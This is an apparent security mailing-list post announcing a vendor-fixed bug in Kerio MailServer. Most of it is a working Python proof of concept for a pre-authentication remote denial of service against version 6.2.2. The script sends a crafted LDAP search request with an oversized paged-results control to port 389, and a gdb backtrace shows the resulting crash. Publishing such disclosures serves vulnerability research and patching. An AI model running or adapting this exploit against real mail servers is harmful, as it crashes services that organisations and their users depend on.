kms1.py.txt

`Hi,  
  
Kerio MailServer 6.3.1 changelog mentions the following bug fix:  
'Fixed possible service stop when handling certain LDAP query'  
  
It turns out that vd_kms6 vulnerability (which is a part of VulnDisco since Oct,  
2006) has been fixed.  
  
Below is a simple proof of concept code for this bug:  
  
#!/usr/bin/env python  
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS  
# fixed in Kerio MailServer 6.3.1  
#  
# Copyright (c) 2006 Evgeny Legerov  
#  
# Permission to use, copy, modify, and distribute this software for any  
# purpose with or without fee is hereby granted, provided that the above  
# copyright notice and this permission notice appear in all copies.  
#  
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES  
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF  
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR  
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES  
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN  
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF  
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
  
  
"""  
gdb backtrace:  
# gdb -q ./mailserver core.18450  
(no debugging symbols found)  
Using host libthread_db library "/lib/libthread_db.so.1".  
Reading symbols from shared object read from target memory...(no debugging  
symbols found)...done.  
Loaded system supplied DSO at 0xb76000  
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.  
Program terminated with signal 11, Segmentation fault.  
...  
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.  
Loaded symbols for /lib/ld-linux.so.2  
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()  
(gdb) bt  
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()  
#1 0x0821c387 in LDAPSearchRequest::setAll ()  
#2 0x08093d8a in Ber::getSearchRequest ()  
#3 0x08205e48 in LDAPServer::search ()  
#4 0x08207de0 in LDAPServer::server ()  
#5 0x08207e2e in ldap_handler ()  
#6 0x0841be13 in KServerTask::handler ()  
#7 0x082033c6 in KThreadPool::workerThread ()  
#8 0x086ee7b6 in kerio::tiny::thread ()  
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0  
#10 0x00558dee in clone () from /lib/libc.so.6  
(gdb) x/i $eip  
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:   
mov (%eax),%edx  
(gdb) i r eax  
eax 0x449 1097  
"""  
  
from socket import *  
  
host = "localhost"  
port = 389  
  
s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"  
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"  
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"  
s += "\x20\x30\x82\x04\x1c"  
s += "\x01"*1024  
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"  
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"  
s += "\x00"  
  
sock = socket(AF_INET, SOCK_STREAM)  
sock.connect((host,port))  
sock.sendall(s)  
sock.recv(10000)  
sock.close()  
  
Regards,  
-Evgeny  
  
  
`